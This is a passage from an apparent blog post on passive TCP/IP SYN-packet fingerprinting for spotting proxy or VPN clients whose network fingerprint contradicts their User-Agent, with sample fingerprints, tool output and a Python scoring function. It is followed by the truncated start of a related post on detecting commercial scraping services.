<p><strong>iPhone</strong>: A iPhone (User-Agent: <code>iPhone; CPU iPhone OS 14_4_1 like Mac OS X</code>) visiting my web server. Based on the SYN fingerprint alone, it's not possible to discern whether it's an macOS device or an iOS device. But the classification is good enough to say that it is with high confidence an Apple device.</p>
<div class="highlight"><pre><span></span><code>python tcp_fingerprint.py -i eth0 --classify
Loaded <span class="m">716</span> fingerprints from the database
listening on interface eth0
---------------------------------
<span class="m">1616184541</span>: <span class="m">85</span>.19.65.217:49988 -> <span class="m">167</span>.99.241.135:443 <span class="o">[</span>SYN<span class="o">]</span>
<span class="o">{</span><span class="s1">'avgScoreOsClass'</span>: <span class="o">{</span><span class="s1">'Android'</span>: <span class="s1">'avg=4.18, N=36'</span>,
<span class="s1">'Linux'</span>: <span class="s1">'avg=3.31, N=99'</span>,
<span class="s1">'Windows'</span>: <span class="s1">'avg=3.36, N=365'</span>,
<span class="s1">'iOS'</span>: <span class="s1">'avg=6.95, N=20'</span>,
<span class="s1">'macOS'</span>: <span class="s1">'avg=7.26, N=189'</span><span class="o">}</span>,
<span class="s1">'bestNGuesses'</span>: <span class="o">[{</span><span class="s1">'os'</span>: <span class="s1">'macOS'</span>, <span class="s1">'score'</span>: <span class="s1">'10.0/10'</span><span class="o">}</span>,
<span class="o">{</span><span class="s1">'os'</span>: <span class="s1">'macOS'</span>, <span class="s1">'score'</span>: <span class="s1">'10.0/10'</span><span class="o">}</span>,
<span class="o">{</span><span class="s1">'os'</span>: <span class="s1">'macOS'</span>, <span class="s1">'score'</span>: <span class="s1">'10.0/10'</span><span class="o">}]}</span>
---------------------------------
<span class="m">1616184541</span>: <span class="m">167</span>.99.241.135:443 -> <span class="m">85</span>.19.65.217:49988 <span class="o">[</span>SYN+ACK<span class="o">]</span>
---------------------------------
</code></pre></div>
<p><strong>Windows 10</strong>: And a Windows 10 (<code>Windows NT 10.0; Win64; x64</code>) device visiting my server:</p>
<div class="highlight"><pre><span></span><code>python tcp_fingerprint.py -i eth0 --classify
Loaded <span class="m">716</span> fingerprints from the database
listening on interface eth0
---------------------------------
<span class="m">1616184750</span>: <span class="m">186</span>.53.223.136:10047 -> <span class="m">167</span>.99.241.135:443 <span class="o">[</span>SYN<span class="o">]</span>
<span class="o">{</span><span class="s1">'avgScoreOsClass'</span>: <span class="o">{</span><span class="s1">'Android'</span>: <span class="s1">'avg=3.88, N=36'</span>,
<span class="s1">'Linux'</span>: <span class="s1">'avg=4.85, N=99'</span>,
<span class="s1">'Windows'</span>: <span class="s1">'avg=7.47, N=365'</span>,
<span class="s1">'iOS'</span>: <span class="s1">'avg=4.03, N=20'</span>,
<span class="s1">'macOS'</span>: <span class="s1">'avg=3.81, N=189'</span><span class="o">}</span>,
<span class="s1">'bestNGuesses'</span>: <span class="o">[{</span><span class="s1">'os'</span>: <span class="s1">'Windows'</span>, <span class="s1">'score'</span>: <span class="s1">'10.0/10'</span><span class="o">}</span>,
<span class="o">{</span><span class="s1">'os'</span>: <span class="s1">'Windows'</span>, <span class="s1">'score'</span>: <span class="s1">'10.0/10'</span><span class="o">}</span>,
<span class="o">{</span><span class="s1">'os'</span>: <span class="s1">'Windows'</span>, <span class="s1">'score'</span>: <span class="s1">'10.0/10'</span><span class="o">}]}</span>
---------------------------------
<span class="m">1616184750</span>: <span class="m">167</span>.99.241.135:443 -> <span class="m">186</span>.53.223.136:10047 <span class="o">[</span>SYN+ACK<span class="o">]</span>
---------------------------------
</code></pre></div>
<h2>Introduction</h2>
<p>In this blog post, I try to TCP/IP fingerprint web clients that connect to a web server.</p>
<p>The <a href="https://github.com/NikolaiT/zardaxt">fingerprinting tool</a> is running passively on the server and does not modify TCP/IP packets. The goal is to detect a mismatch in the operating system specified in the HTTP User-Agent header and the operating system inferred from the TCP/IP header intricacies. Put differently: If the TCP/IP fingerprint operating system is different than the claimed User-Agent operating system, there <em>must</em> be something wrong with that client.</p>
<p>Quick TCP/IP recap:</p>
<p>The <a href="https://en.wikipedia.org/wiki/Internet_Protocol">Internet Protocol (IP)</a> is responsible for transmitting packets from host to host. A host is a node in a network that is addressable with a IPv4 or IPv6 address. The IP protocol operates on the Internet/Network layer.</p>
<p><a href="https://en.wikipedia.org/wiki/Transmission_Control_Protocol">Transmission Control Protocol (TCP)</a> however is one layer above the IP protocol. TCP is mainly responsible to guarantee a robust, fail-proof connection between two hosts. The TCP protocol brings packet loss recovery, guarantees the packet order and handles congestion control. TCP is connection oriented, it does not care about the routers and intermediate hops between the two communicating hosts.</p>
<h2>Motivation</h2>
<p>Many users need to access anonymizing services such as VPNs or Proxy servers in order to evade Geo-blocking or governmental firewalls.</p>
<p>Those services are also frequently used for scraping purposes (which I don't have any issues with, as long as the scraping traffic does not impair the websites or accesses private data).</p>
<p>However, many cyber criminals also use services such as SOCKS Proxies, TOR or VPN's to launch cyber attacks and to hide their true IP identity.</p>
<p>For those reasons, it would be nice to have a tool that allows to make a statistical conjecture such as: <em>"It is very likely that this TCP/IP connection is routed over a VPN/Proxy"</em>.</p>
<h2>But what exactly is TCP/IP fingerprinting?</h2>
<p>The hypothesis is that different operating systems (and different minor versions among those operating systems) use different default values in their initial TCP SYN packet that initiates the <a href="https://en.wikipedia.org/wiki/Transmission_Control_Protocol#Connection_establishment">TCP three-way handshake</a>.</p>
<p>In this blog post, we will exclusively look at the initial TCP SYN packet. I am perfectly aware that we could investigate the whole TCP packet exchange to deduce more information, such as for example what kind of <a href="https://en.wikipedia.org/wiki/TCP_congestion_control">TCP congestion control algorithm</a> the client suggests. For example, <a href="https://en.wikipedia.org/wiki/Compound_TCP">Compound TCP</a> is mostly supported by Microsoft Windows operating systems. But I will limit the analysis to the initial SYN packet.</p>
<p>What TCP/IP header fields exactly are assumed to be OS-specific?</p>
<h3>Entropy from the <a href="https://en.wikipedia.org/wiki/IPv4">IP header</a></h3>
<ul>
<li><code>IP.ttl (8 bits)</code> - Initial time to live (TTL) value of the IP header. The TTL indicates how long a IP packet is allowed to circulate in the Internet. Each hop (such as a router) decrements the TTL field by one. The maximum TTL value is 255, the maximum value of a single octet (8 bits). A recommended initial value is 64, but some operating systems customize this value. Hence it's relevancy for TCP/IP fingerprinting.</li>
<li><code>IP.flags (3 bits)</code> - Don't fragment (DF) and more fragments (MF) flags. In the flags field of the IPv4 header, there are three bits for control flags. The "don't fragment" (DF) bit plays a central role in Path Maximum Transmission Unit Discovery (PMTUD) because it determines whether or not a packet is allowed to be <a href="https://www.cisco.com/c/en/us/support/docs/ip/generic-routing-encapsulation-gre/25885-pmtud-ipfrag.html">fragmented</a>. Some OS set the DF flag in the IP header, others don't.</li>
</ul>
<h3>Entropy from the <a href="https://en.wikipedia.org/wiki/Transmission_Control_Protocol">TCP header</a></h3>
<figure>
<img src="https://incolumitas.com/images/tcpHeader.jpg" alt="TCP header" />
<figcaption>TCP header fields <a style="font-size: 80%" href="https://stackoverflow.com/questions/24480272/where-is-the-source-and-destination-address-fields-in-tcp-header">(Image Source)</a><span style="font-size: 60%"></span></figcaption>
</figure>
<ul>
<li><code>TCP.data_offset (4 bits)</code> - This is the size of the TCP header in 32-bit words with a minimum size of 5 words and a maximum size of 15 words. Therefore, the maximum TCP header size size is 60 bytes (with 40 bytes of options data). The TCP header size thus depends on how much options are present at the end of the header. </li>
<li><code>TCP.window_size (16 bits)</code> - Initial window size. The idea is that different operating systems use a different initial window size in the initial TCP SYN packet.</li>
<li><code>TCP.flags (9 bits)</code> - This header field contains 9 one-bit flags for TCP protocol controlling purposes. The initial SYN packet has mostly a flags value of 2 (which means that only the SYN flag is set). However, I have also observed flags values of 194 (2^1 + 2^6 + 2^7), which means that the SYN, ECE and CWR flags are set to one. If the SYN flag is set, ECE means that the client is <a href="https://en.wikipedia.org/wiki/Explicit_Congestion_Notification">ECN</a> capable. Congestion window reduced (CWR) means that the sending host received a TCP segment with the ECE flag set and had responded in congestion control mechanism.</li>
<li><code>TCP.acknowledgment_number (32 bits)</code> - If the ACK flag is set then the value of this field is the next sequence number that the sender of the ACK is expecting. <em>Should</em> be zero if the SYN flag is set on the very first packet.</li>
<li><code>TCP.sequence_number (32 bits)</code> - If the SYN flag is set (1), then this is the initial sequence number. It is conjectured that different operating systems use different initial sequence numbers, but the initial sequence number is most likely randomly chosen. Therefore this field is most likely of no particular help regarding fingerprinting.</li>
<li><code>TCP.urgent_pointer (16 bits)</code> - If the URG flag is set, then this 16-bit field is an offset from the sequence number indicating the last urgent data byte. It <em>should</em> be zero in initial SYN packets.</li>
<li><code>TCP.options (Variable 0-320 bits)</code> - All TCP Options. The length of this field is determined by the data offset field. Contains a lot of information, but most importantly: The Maximum Segment Size (MSS), the Window scale value. Because the TCP options data is variable in size, it is the most important source of entropy to distinguish operating systems. The order of the TCP options is also taken into account.</li>
</ul>
<h3>Example TCP/IP Fingerprint</h3>
<p>Enough theory. Let's get practical. Now I will present two TCP/IP fingerprinting samples, one taken with my laptop desktop computer (Ubuntu 18.04), the other recorded with my Android 9 mobile phone (Motorola g6).</p>
<p>Desktop Ubuntu 18.04 (User-Agent: <em>Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36</em>)</p>
<div class="highlight"><pre><span></span><code><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="nt">"ts"</span><span class="p">:</span><span class="w"> </span><span class="mi">1615647148</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"src_ip"</span><span class="p">:</span><span class="w"> </span><span class="s2">"79.203.24.230"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"dst_ip"</span><span class="p">:</span><span class="w"> </span><span class="s2">"167.99.241.135"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"dst_port"</span><span class="p">:</span><span class="w"> </span><span class="s2">"443"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"ip_ttl"</span><span class="p">:</span><span class="w"> </span><span class="mi">55</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"ip_df"</span><span class="p">:</span><span class="w"> </span><span class="mi">1</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"ip_mf"</span><span class="p">:</span><span class="w"> </span><span class="mi">0</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"tcp_window_size"</span><span class="p">:</span><span class="w"> </span><span class="mi">29200</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"tcp_flags"</span><span class="p">:</span><span class="w"> </span><span class="mi">2</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"tcp_ack"</span><span class="p">:</span><span class="w"> </span><span class="mi">0</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"tcp_header_length"</span><span class="p">:</span><span class="w"> </span><span class="mi">160</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"tcp_urp"</span><span class="p">:</span><span class="w"> </span><span class="mi">0</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"tcp_options"</span><span class="p">:</span><span class="w"> </span><span class="s2">"M1412,S,T,N,W7,"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"tcp_window_scaling"</span><span class="p">:</span><span class="w"> </span><span class="mi">7</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"tcp_timestamp"</span><span class="p">:</span><span class="w"> </span><span class="mi">3733126878</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"tcp_timestamp_echo_reply"</span><span class="p">:</span><span class="w"> </span><span class="mi">0</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"tcp_mss"</span><span class="p">:</span><span class="w"> </span><span class="mi">1412</span><span class="w"></span>
<span class="p">}</span><span class="w"></span>
</code></pre></div>
<p>Android Motorola (g6)</p>
<div class="highlight"><pre><span></span><code><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="nt">"ts"</span><span class="p">:</span><span class="w"> </span><span class="mi">1615656348</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"src_ip"</span><span class="p">:</span><span class="w"> </span><span class="s2">"79.203.24.230"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"dst_ip"</span><span class="p">:</span><span class="w"> </span><span class="s2">"167.99.241.135"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"dst_port"</span><span class="p">:</span><span class="w"> </span><span class="s2">"443"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"ip_ttl"</span><span class="p">:</span><span class="w"> </span><span class="mi">55</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"ip_df"</span><span class="p">:</span><span class="w"> </span><span class="mi">0</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"ip_mf"</span><span class="p">:</span><span class="w"> </span><span class="mi">0</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"tcp_window_size"</span><span class="p">:</span><span class="w"> </span><span class="mi">65535</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"tcp_flags"</span><span class="p">:</span><span class="w"> </span><span class="mi">2</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"tcp_ack"</span><span class="p">:</span><span class="w"> </span><span class="mi">0</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"tcp_header_length"</span><span class="p">:</span><span class="w"> </span><span class="mi">160</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"tcp_urp"</span><span class="p">:</span><span class="w"> </span><span class="mi">0</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"tcp_options"</span><span class="p">:</span><span class="w"> </span><span class="s2">"M1412,S,T,N,W9,"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"tcp_window_scaling"</span><span class="p">:</span><span class="w"> </span><span class="mi">9</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"tcp_timestamp"</span><span class="p">:</span><span class="w"> </span><span class="mi">1355521</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"tcp_timestamp_echo_reply"</span><span class="p">:</span><span class="w"> </span><span class="mi">0</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"tcp_mss"</span><span class="p">:</span><span class="w"> </span><span class="mi">1412</span><span class="w"></span>
<span class="p">}</span><span class="w"></span>
</code></pre></div>
<p>We can observe several things:</p>
<ul>
<li>Ubuntu 18.04 has a entirely different <code>tcp_window_size</code> (29200) compared to the <code>tcp_window_size</code> in Android 9 (65535)</li>
<li>The IP don't fragment (DF) bit <code>ip_df</code> is set in Ubuntu 18.04 but not in Android 9</li>
<li>The <code>tcp_window_scaling</code> value is different in the two operating systems (7 vs 9)</li>
</ul>
<p>So we learn: Different operating systems send different initial TCP/IP header fields.</p>
<p>But can we really correlate those values with operating systems? How accurate is this <em>science</em>?</p>
<p>I don't know :D </p>
<p>I could investigate the concrete TCP/IP stack implementations or look up the default values, but I am to lazy for that.</p>
<h2>How to correlate the TCP/IP Fingerprint with the Operating System?</h2>
<p>Now that we have collected TCP/IP fingerprints, we correlate those values with the User-Agent and the <code>navigator.platform</code> property extracted from the HTTP headers and <code>windows.navigator</code> object.</p>
<p>The obvious caveat here is: <em>Shit in, Shit out</em>.</p>
<p>If an client spoofs any of the recorded values, we create an incorrect correlation which in turn hurts our classification system. But let's assume I have my ways to filter out spoofed data on some other layer (Hint: Behavioral analysis).</p>
<p>The above correlation process will yield a TCP/IP fingerprint enriched with the corresponding operating system. This is how the <a href="https://github.com/NikolaiT/zardaxt/tree/master/database">database</a> looks like.</p>
<p>The current classification algorithm (<a href="https://github.com/NikolaiT/zardaxt/blob/master/tcp_fingerprint.py">click here</a> for the newest version) looks like this:</p>
<div class="highlight"><pre><span></span><code><span class="k">def</span> <span class="nf">makeOsGuess</span><span class="p">(</span><span class="n">fp</span><span class="p">,</span> <span class="n">n</span><span class="o">=</span><span class="mi">3</span><span class="p">):</span>
<span class="sd">"""</span>
<span class="sd"> Return the highest scoring TCP/IP fingerprinting match from the database.</span>
<span class="sd"> If there is more than one highest scoring match, return all the highest scoring matches.</span>
<span class="sd"> As a second guess, output the operating system with the highest, normalized average score.</span>
<span class="sd"> """</span>
<span class="n">perfectScore</span> <span class="o">=</span> <span class="mi">10</span>
<span class="n">scores</span> <span class="o">=</span> <span class="p">[]</span>
<span class="k">for</span> <span class="n">i</span><span class="p">,</span> <span class="n">entry</span> <span class="ow">in</span> <span class="nb">enumerate</span><span class="p">(</span><span class="n">dbList</span><span class="p">):</span>
<span class="n">score</span> <span class="o">=</span> <span class="mi">0</span>
<span class="c1"># @TODO: consider `ip_tll`</span>
<span class="c1"># @TODO: consider `tcp_window_scaling`</span>
<span class="c1"># check IP DF bit</span>
<span class="k">if</span> <span class="n">entry</span><span class="p">[</span><span class="s1">'ip_df'</span><span class="p">]</span> <span class="o">==</span> <span class="n">fp</span><span class="p">[</span><span class="s1">'ip_df'</span><span class="p">]:</span>
<span class="n">score</span> <span class="o">+=</span> <span class="mi">1</span>
<span class="c1"># check IP MF bit</span>
<span class="k">if</span> <span class="n">entry</span><span class="p">[</span><span class="s1">'ip_mf'</span><span class="p">]</span> <span class="o">==</span> <span class="n">fp</span><span class="p">[</span><span class="s1">'ip_mf'</span><span class="p">]:</span>
<span class="n">score</span> <span class="o">+=</span> <span class="mi">1</span>
<span class="c1"># check TCP window size</span>
<span class="k">if</span> <span class="n">entry</span><span class="p">[</span><span class="s1">'tcp_window_size'</span><span class="p">]</span> <span class="o">==</span> <span class="n">fp</span><span class="p">[</span><span class="s1">'tcp_window_size'</span><span class="p">]:</span>
<span class="n">score</span> <span class="o">+=</span> <span class="mf">1.5</span>
<span class="c1"># check TCP flags</span>
<span class="k">if</span> <span class="n">entry</span><span class="p">[</span><span class="s1">'tcp_flags'</span><span class="p">]</span> <span class="o">==</span> <span class="n">fp</span><span class="p">[</span><span class="s1">'tcp_flags'</span><span class="p">]:</span>
<span class="n">score</span> <span class="o">+=</span> <span class="mi">1</span>
<span class="c1"># check TCP header length</span>
<span class="k">if</span> <span class="n">entry</span><span class="p">[</span><span class="s1">'tcp_header_length'</span><span class="p">]</span> <span class="o">==</span> <span class="n">fp</span><span class="p">[</span><span class="s1">'tcp_header_length'</span><span class="p">]:</span>
<span class="n">score</span> <span class="o">+=</span> <span class="mi">1</span>
<span class="c1"># check TCP MSS</span>
<span class="k">if</span> <span class="n">entry</span><span class="p">[</span><span class="s1">'tcp_mss'</span><span class="p">]</span> <span class="o">==</span> <span class="n">fp</span><span class="p">[</span><span class="s1">'tcp_mss'</span><span class="p">]:</span>
<span class="n">score</span> <span class="o">+=</span> <span class="mf">1.5</span>
<span class="c1"># check TCP options</span>
<span class="k">if</span> <span class="n">entry</span><span class="p">[</span><span class="s1">'tcp_options'</span><span class="p">]</span> <span class="o">==</span> <span class="n">fp</span><span class="p">[</span><span class="s1">'tcp_options'</span><span class="p">]:</span>
<span class="n">score</span> <span class="o">+=</span> <span class="mi">3</span>
<span class="k">else</span><span class="p">:</span>
<span class="c1"># check order of TCP options (this is weaker than TCP options equality)</span>
<span class="n">orderEntry</span> <span class="o">=</span> <span class="s1">''</span><span class="o">.</span><span class="n">join</span><span class="p">([</span><span class="n">e</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="k">for</span> <span class="n">e</span> <span class="ow">in</span> <span class="n">entry</span><span class="p">[</span><span class="s1">'tcp_options'</span><span class="p">]</span><span class="o">.</span><span class="n">split</span><span class="p">(</span><span class="s1">','</span><span class="p">)</span> <span class="k">if</span> <span class="n">e</span><span class="p">])</span>
<span class="n">orderFp</span> <span class="o">=</span> <span class="s1">''</span><span class="o">.</span><span class="n">join</span><span class="p">([</span><span class="n">e</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="k">for</span> <span class="n">e</span> <span class="ow">in</span> <span class="n">fp</span><span class="p">[</span><span class="s1">'tcp_options'</span><span class="p">]</span><span class="o">.</span><span class="n">split</span><span class="p">(</span><span class="s1">','</span><span class="p">)</span> <span class="k">if</span> <span class="n">e</span><span class="p">])</span>
<span class="k">if</span> <span class="n">orderEntry</span> <span class="o">==</span> <span class="n">orderFp</span><span class="p">:</span>
<span class="n">score</span> <span class="o">+=</span> <span class="mi">2</span>
<span class="n">scores</span><span class="o">.</span><span class="n">append</span><span class="p">({</span>
<span class="s1">'i'</span><span class="p">:</span> <span class="n">i</span><span class="p">,</span>
<span class="s1">'score'</span><span class="p">:</span> <span class="n">score</span><span class="p">,</span>
<span class="s1">'os'</span><span class="p">:</span> <span class="n">entry</span><span class="o">.</span><span class="n">get</span><span class="p">(</span><span class="s1">'os'</span><span class="p">,</span> <span class="p">{})</span><span class="o">.</span><span class="n">get</span><span class="p">(</span><span class="s1">'name'</span><span class="p">),</span>
<span class="p">})</span>
<span class="c1"># Return the highest scoring TCP/IP fingerprinting match</span>
<span class="n">scores</span><span class="o">.</span><span class="n">sort</span><span class="p">(</span><span class="n">key</span><span class="o">=</span><span class="k">lambda</span> <span class="n">x</span><span class="p">:</span> <span class="n">x</span><span class="p">[</span><span class="s1">'score'</span><span class="p">],</span> <span class="n">reverse</span><span class="o">=</span><span class="kc">True</span><span class="p">)</span>
<span class="n">guesses</span> <span class="o">=</span> <span class="p">[]</span>
<span class="n">highest_score</span> <span class="o">=</span> <span class="n">scores</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span><span class="o">.</span><span class="n">get</span><span class="p">(</span><span class="s1">'score'</span><span class="p">)</span>
<span class="k">for</span> <span class="n">guess</span> <span class="ow">in</span> <span class="n">scores</span><span class="p">:</span>
<span class="k">if</span> <span class="n">guess</span><span class="p">[</span><span class="s1">'score'</span><span class="p">]</span> <span class="o">!=</span> <span class="n">highest_score</span><span class="p">:</span>
<span class="k">break</span>
<span class="n">guesses</span><span class="o">.</span><span class="n">append</span><span class="p">({</span>
<span class="s1">'score'</span><span class="p">:</span> <span class="s1">'</span><span class="si">{}</span><span class="s1">/</span><span class="si">{}</span><span class="s1">'</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">guess</span><span class="p">[</span><span class="s1">'score'</span><span class="p">],</span> <span class="n">perfectScore</span><span class="p">),</span>
<span class="s1">'os'</span><span class="p">:</span> <span class="n">guess</span><span class="p">[</span><span class="s1">'os'</span><span class="p">],</span>
<span class="p">})</span>
<span class="c1"># get the os with the highest, normalized average score</span>
<span class="n">os_score</span> <span class="o">=</span> <span class="p">{}</span>
<span class="k">for</span> <span class="n">guess</span> <span class="ow">in</span> <span class="n">scores</span><span class="p">:</span>
<span class="k">if</span> <span class="n">guess</span><span class="p">[</span><span class="s1">'os'</span><span class="p">]:</span>
<span class="k">if</span> <span class="ow">not</span> <span class="n">os_score</span><span class="o">.</span><span class="n">get</span><span class="p">(</span><span class="n">guess</span><span class="p">[</span><span class="s1">'os'</span><span class="p">]):</span>
<span class="n">os_score</span><span class="p">[</span><span class="n">guess</span><span class="p">[</span><span class="s1">'os'</span><span class="p">]]</span> <span class="o">=</span> <span class="p">[]</span>
<span class="n">os_score</span><span class="p">[</span><span class="n">guess</span><span class="p">[</span><span class="s1">'os'</span><span class="p">]]</span><span class="o">.</span><span class="n">append</span><span class="p">(</span><span class="n">guess</span><span class="p">[</span><span class="s1">'score'</span><span class="p">])</span>
<span class="n">avg_os_score</span> <span class="o">=</span> <span class="p">{}</span>
<span class="k">for</span> <span class="n">key</span> <span class="ow">in</span> <span class="n">os_score</span><span class="p">:</span>
<span class="n">N</span> <span class="o">=</span> <span class="nb">len</span><span class="p">(</span><span class="n">os_score</span><span class="p">[</span><span class="n">key</span><span class="p">])</span>
<span class="c1"># only consider OS classes with at least 8 elements</span>
<span class="k">if</span> <span class="n">N</span> <span class="o">>=</span> <span class="mi">8</span><span class="p">:</span>
<span class="n">avg</span> <span class="o">=</span> <span class="nb">sum</span><span class="p">(</span><span class="n">os_score</span><span class="p">[</span><span class="n">key</span><span class="p">])</span> <span class="o">/</span> <span class="nb">len</span><span class="p">(</span><span class="n">os_score</span><span class="p">[</span><span class="n">key</span><span class="p">])</span>
<span class="n">avg_os_score</span><span class="p">[</span><span class="n">key</span><span class="p">]</span> <span class="o">=</span> <span class="s1">'avg=</span><span class="si">{}</span><span class="s1">, N=</span><span class="si">{}</span><span class="s1">'</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="nb">round</span><span class="p">(</span><span class="n">avg</span><span class="p">,</span> <span class="mi">2</span><span class="p">),</span> <span class="n">N</span><span class="p">)</span>
<span class="k">return</span> <span class="p">{</span>
<span class="s1">'bestGuess'</span><span class="p">:</span> <span class="n">guesses</span><span class="p">[:</span><span class="n">n</span><span class="p">],</span>
<span class="s1">'avgScoreOsClass'</span><span class="p">:</span> <span class="n">avg_os_score</span><span class="p">,</span>
<span class="p">}</span>
</code></pre></div>
<p>To improve upon this, I need to build equivalency classes and I need to define operating system classes.</p>
<p>Major and minor operating system classes:</p>
<ol>
<li><strong>macOS</strong> and minor versions such as Sierra, High Sierra, Mojave, Catalina</li>
<li><strong>iOS</strong></li>
<li><strong>Android</strong> and minor versions such as Android 8, Android 9, Android 10</li>
<li><strong>Windows</strong> and minor versions such as Windows 7 (NT 6.1), Windows 8 (NT 6.3) and Windows 10 (NT 10.0)</li>
<li><strong>Linux</strong> and (maybe) distinct distributions such as Ubuntu, Suse, Linux Arch, ...</li>
</ol>
<p>I don't think it is feasible to classify everything properly for every minor operating system version using the User-Agent alone.</p>
<p>Nevertheless, the User-Agent should be accurate enough for the five major operating system classes. After all, most proxy or VPN servers are running some kind of Linux system, but often, the connecting clients claim to be a macOS or Windows operating system. I just want to detect that they are lying, not <em>how badly</em> they are lying.</p>
<h2>Detecting Proxy/VPN Usage with TCP/IP Fingerprinting</h2>
<p>General idea: My goal is <em>not</em> to identify a specific version of a proxy or VPN software.</p>
<p>Rather, I want to recognize that there is a discrepancy in the operating system derived from the User-Agent and the operating system suspected behind the TCP/IP fingerprint. Such a mismatch is enough to flag the established connection as potentially malicious.</p>
<p>In order to be relatively sure that the observed TCP/IP fingerprint does not pertain to one of the above five listed operating system classes, I need to collect as many unique fingerprint samples as possible for each operating system class.</p>
<p>But what happens if the VPN or proxy server dynamically changes its TCP/IP fingerprint?</p>
<p>Indeed, it is very easy to alter the TCP/IP fingerprint on Linux systems. For example, you can change the MSS on a specific route on Linux with the following command:</p>
<div class="highlight"><pre><span></span><code>ip route add <span class="m">11</span>.22.33.44/32 via <span class="m">172</span>.17.0.1 advmss <span class="m">1340</span>
</code></pre></div>
<p>The question however is: How practical is that? Are those proxy/VPN services really gonna alter the TCP/IP fingerprint for every client for which they are routing the traffic based on application layer data? </p>
<p>The proxy/VPN service would have to detect the clients operating system by inspecting the HTTP headers and update the TCP/IP fingerprint accordingly. I don't think this approach is practical.</p>
<h3>Detecting Proxy / VPN connections based on MTU/MSS ratio</h3>
<p><a href="https://ipleak.com/articles/proxy-vpn-detection-passive-fingerprinting">This article</a> suggest to detect proxy / VPN usage by comparing the MTU/MSS ratio of a connection to a standard table of MTU/MSS ratio. </p>
<p>Remember: </p>
<ul>
<li>MTU (Maximum Transmission Unit) is the upper size of an IP packet including the header.</li>
<li>MSS (Maximum Segment Size) is the upper size of the data unit being transmitted (excluding the header).</li>
</ul>
<p>Protocols such as PPTP, L2TP, or IPsec IKE lower the MTU setting at the network interface (For example to 1400 for IPsec). By comparing the packet size within an intercepted connection to standard MTU / MSS settings, the use of a proxy or VPN can be detected.</p>Detecting scraping services2021-03-11T22:00:00+01:002021-03-13T18:00:00+01:00Nikolai Tschachertag:incolumitas.com,2021-03-11:/2021/03/11/detecting-scraping-services/<p>In this blog post I will demonstrate how it is possible to detect several scraping services: <a href="https://luminati.io/">luminati.io</a>, <a href="https://scrapingbee.com">ScrapingBee</a>, <a href="https://www.scraperapi.com/">scraperapi.com</a>, <a href="https://scrapingrobot.com">scrapingrobot.com</a>, <a href="https://scrapfly.io">scrapfly.io</a>.</p><p>Many professional scraping services exist that offer data extraction services to their clients. More often than not, those services attempt to camouflage that they are bots. Sometimes even professional services make mistakes though.</p>
<p>My intention with this blog post is not to diminish and look down on the work that those services have put into their products. I just want to demonstrate that there are a plethora of ways to detect the automated nature of their traffic.</p>
<p>In my opinion, <strong>it is much harder to create a stealthy scraping service than to detect it</strong>: For detection, you only need to find one single anomaly. To remain stealthy, you must be perfect. Therefore, a resilient and stealthy scraping service is very hard to find. I hope those services can make use of some of my resarch provdided for free here.</p>
<p><strong>General Strategy</strong>: The bot detection site <a href="https://bot.incolumitas.com">bot.incolumitas.com</a> was used as a scraping target with all scraping services listed below. For <a href="https://luminati.io/">Luminati.io</a> I had to <a href="https://github.com/abrahamjuliot/creepjs">mount heavy machinery</a> to detect their <a href="https://luminati.io/products/data-collector">data collector</a> as bot. I always used the JavaScript rendering option from the scraping services listed below (thus using real browsers).</p>
<h2>TL;DR</h2>
<ol>
<li>
<p><a href="https://luminati.io/">Luminati.io</a>: <code>navigator.platform</code> is <code>Linux x86_64</code> in <a href="https://developer.mozilla.org/en-US/docs/Web/API/Web_Workers_API/Using_web_workers">Web Worker</a> and iframe contexts compared to <code>Win32</code> in the normal <code>window.navigator.platform</code> property. In some cases, the TCP/IP fingerprint doesn't look like a Windows NT 10.0 fingerprint, even though the User-Agent claims it.</p>
</li>
<li>
